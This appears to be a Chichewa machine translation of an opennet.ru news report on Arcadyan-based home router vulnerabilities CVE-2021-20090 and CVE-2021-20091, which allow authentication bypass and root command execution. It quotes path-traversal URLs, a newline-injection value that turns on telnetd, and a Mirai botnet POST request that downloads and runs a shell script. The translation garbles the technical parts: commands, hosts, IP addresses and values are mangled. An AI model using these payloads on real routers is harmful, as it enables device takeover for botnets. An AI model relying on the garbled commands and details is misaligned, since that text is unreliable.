Kuwukira kwakukulu kwalembedwa pamaneti motsutsana ndi ma routers akunyumba omwe firmware yake imagwiritsa ntchito kukhazikitsa seva ya HTTP kuchokera ku kampani ya Arcadyan. Kuti mukhale ndi mphamvu pazida, kuphatikizika kwa zovuta ziwiri kumagwiritsidwa ntchito zomwe zimalola kukhazikitsidwa kwakutali kwa code yosagwirizana ndi maufulu a mizu. Vutoli limakhudza ma routers osiyanasiyana a ADSL ochokera ku Arcadyan, ASUS ndi Buffalo, komanso zida zomwe zimaperekedwa pansi pamtundu wa Beeline (vutoli limatsimikiziridwa mu Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ndi othandizira ena a telecom. Zikudziwika kuti vutoli lakhalapo mu Arcadyan firmware kwa zaka zoposa 10 ndipo panthawiyi yatha kusamukira ku zitsanzo za zipangizo za 20 kuchokera kwa opanga 17 osiyanasiyana.
Chiwopsezo choyamba, CVE-2021-20090, chimatheketsa kupeza zolemba zilizonse zapaintaneti popanda kutsimikizika. Zomwe zili pachiwopsezo ndikuti mu mawonekedwe a intaneti, maulalo ena omwe zithunzi, mafayilo a CSS ndi zolemba za JavaScript zimatumizidwa zimafikiridwa popanda kutsimikizika. Pachifukwa ichi, maupangiri omwe amaloledwa kulowa popanda kutsimikizira amawunikiridwa pogwiritsa ntchito chigoba choyambirira. Kutchula zilembo za "../" m'njira zopita ku bukhu la makolo ndikoletsedwa ndi firmware, koma kugwiritsa ntchito "..%2f" kuphatikiza kwadumpha. Chifukwa chake, ndizotheka kutsegula masamba otetezedwa mukatumiza zopempha monga "http://192.168.1.1/images/..%2findex.htm".
Chiwopsezo chachiwiri, CVE-2021-20091, chimalola wogwiritsa ntchito wotsimikizika kuti asinthe makonzedwe a chipangizocho potumiza magawo opangidwa mwapadera ku apply_abstract.cgi script, yomwe simayang'ana kupezeka kwa munthu watsopano m'magawo. . Mwachitsanzo, pochita ping, wowukira akhoza kutchula mtengo wa "192.168.1.2%0AARC_SYS_TelnetdEnable=1" m'munda ndikuwunika adilesi ya IP, ndi script, popanga zosintha /tmp/etc/config/ .glbcfg, idzalemba mzere "AARC_SYS_TelnetdEnable=1" mkati mwake ", yomwe imatsegula seva ya telnetd, yomwe imapereka mwayi wopita ku chipolopolo chopanda malire ndi ufulu wa mizu. Momwemonso, pokhazikitsa parameter ya AARC_SYS, mutha kugwiritsa ntchito nambala iliyonse pamakina. Kusatetezeka koyamba kumapangitsa kuti zitheke kuyendetsa script yovuta popanda kutsimikizika poyipeza ngati "/images/..%2fapply_abstract.cgi".
Kuti agwiritse ntchito zofooka, wowukira akuyenera kutumiza pempho ku netiweki doko pomwe intaneti ikugwira ntchito. Poyang'ana mphamvu za kufalikira kwa chiwonongeko, ambiri ogwira ntchito amasiya mwayi pazida zawo kuchokera pa intaneti yakunja kuti athetse matenda a mavuto ndi ntchito yothandizira. Ngati mwayi wogwiritsa ntchito mawonekedwewo uli ndi ma netiweki amkati okha, kuwukira kumatha kuchitika kuchokera pa intaneti yakunja pogwiritsa ntchito njira ya "DNS rebinding". Zowopsa zikugwiritsidwa ntchito kale kulumikiza ma routers ku botnet ya Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC=212.192.241.7_ipad0 1%0A ARC_SYS_TelnetdEnable=212.192.241.72&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; kupindika+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
Source: opennet.ru